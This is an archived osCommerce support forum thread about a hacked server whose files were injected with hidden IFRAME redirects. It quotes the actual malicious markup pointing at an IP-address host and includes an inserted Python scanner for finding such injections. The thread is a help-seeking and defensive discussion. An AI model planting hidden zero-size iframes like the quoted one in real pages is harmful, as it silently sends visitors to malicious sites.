
Security issue?


ludachris


Hey guys, I am in the process of cleaning up all the sites on one of our servers (for the 3rd time) that was hacked due to what we think was a Remote File Include Vulnerability. Here are some links that explain the exploit:

http://www.exploits.in/pnphpbb-remote-file...nerability.html

http://securitydot.net/xpl/exploits/vulner...50/exploit.html

http://securitytracker.com/alerts/2006/Feb/1015624.html

http://www.soledadpenades.com/2006/05/28/i...h-nothing-to-do

Again, I'm not positive if that is the security hole for sure. Basically what happened was, they somehow found a way to write to every file on our server. They added a few lines of IFRAME code that was meant to redirect our visitors to other sites. Every single file on the server was affected, although not all files had the same code added. Some had multiple lines of the same code, others had just one line. It's a dedicated server, and all sites on the server are ours.

The problem is I can't narrow down if it's due to a script we're running or if it's something else. I was hoping someone could tell me with 100% certainty that osCommerce isn't the security hole. We're running other scripts and are checking with the developers of those as well.

Any help would be appreciated. Thanks!


So long as you are running MS2 and have installed the 2 latest security fixes you should be okay.

Nothing is absolutely secure especially when dealing with the web. All that can be done is to close the holes as they are found. This is true for everything (e.g. OSs, applications, extensions, etc).

It could be that someone brute-forced their way into your FTP account to accomplish what they did.

Have you checked the owner and group of the modified files as this would give you an idea of what account was used to perform the modifications?

In case you haven't already done so, I highly suggest you change *every* password on your server (i.e. root user, your user, database user, ftp user, store admin, etc).

"Great spirits have always found violent opposition from mediocre minds. The latter cannot understand it when a man does not thoughtlessly submit to hereditary prejudices but honestly and courageously uses his intelligence." - A. Einstein
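The owner and group check suggested in the reply above can be combined with a sweep for the injected markup. The Python sketch below is an added example, not code from this thread or from osCommerce; the hidden-iframe regex, the function names and the two sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from collections import Counter

# Heuristic (an assumption, tune for your site): an opening <iframe> tag made
# invisible with zero width/height or display:none, like the one posted above.
IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(rb"(?:width|height)\s*=\s*[\"']?0(?!\d)|display\s*:\s*none", re.I)

def scan_tree(root):
    """Return one record per file under root that holds a hidden iframe."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                st = os.stat(path)
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            tags = [t for t in IFRAME.findall(data) if HIDDEN.search(t)]
            if tags:
                hits.append({"path": path, "count": len(tags), "uid": st.st_uid,
                             "gid": st.st_gid, "mtime": int(st.st_mtime)})
    return hits

def owners(hits):
    """Count flagged files per (uid, gid) to see which account owns them."""
    return Counter((h["uid"], h["gid"]) for h in hits)

def demo():
    """Scan a constructed web root: one injected page, one legitimate page."""
    injected = b"<html><body>shop</body></html>\n" + 2 * (
        b'<IFRAME SRC="http://injected.example/in.cgi" WIDTH=0 HEIGHT=0 '
        b'FRAMEBORDER=0 style="display:none;"></IFRAME>')
    legit = b'<iframe src="/map.html" width="600" height="400" frameborder=0></iframe>'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", injected), ("contact.php", legit)):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        hits = scan_tree(root)
        return [(os.path.basename(h["path"]), h["count"]) for h in hits], owners(hits)

if __name__ == "__main__":
    flagged, by_owner = demo()
    print(flagged, dict(by_owner))
```

Ownership is set when a file is created or chowned and does not change when an existing file is edited, so read the (uid, gid) tally together with each record's mtime and the FTP and web server logs for the same time window.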


Where is this code coming from? When I download my page and view the source I can't find it anywhere, please help.

<IFRAME SRC="http://81.95.146.133/sutra/in.cgi?17" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING="no" style="display:none;"></IFRAME><IFRAME SRC="http://81.95.146.133/sutra/in.cgi?17" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING="no" style="display:none;"></IFRAME>


jmac, instead of hijacking someone else's thread you should start your own thread regarding your problem.

In answer to your question, it looks like you have a hacker's exploit installed somewhere, most likely in your application_top.php file.

"Great spirits have always found violent opposition from mediocre minds. The latter cannot understand it when a man does not thoughtlessly submit to hereditary prejudices but honestly and courageously uses his intelligence." - A. Einstein


  • 3 weeks later...

Where are these two security fixes? I'm looking at the osCommerce site and I can't seem to find them.

justin



Archived

This topic is now archived and is closed to further replies.
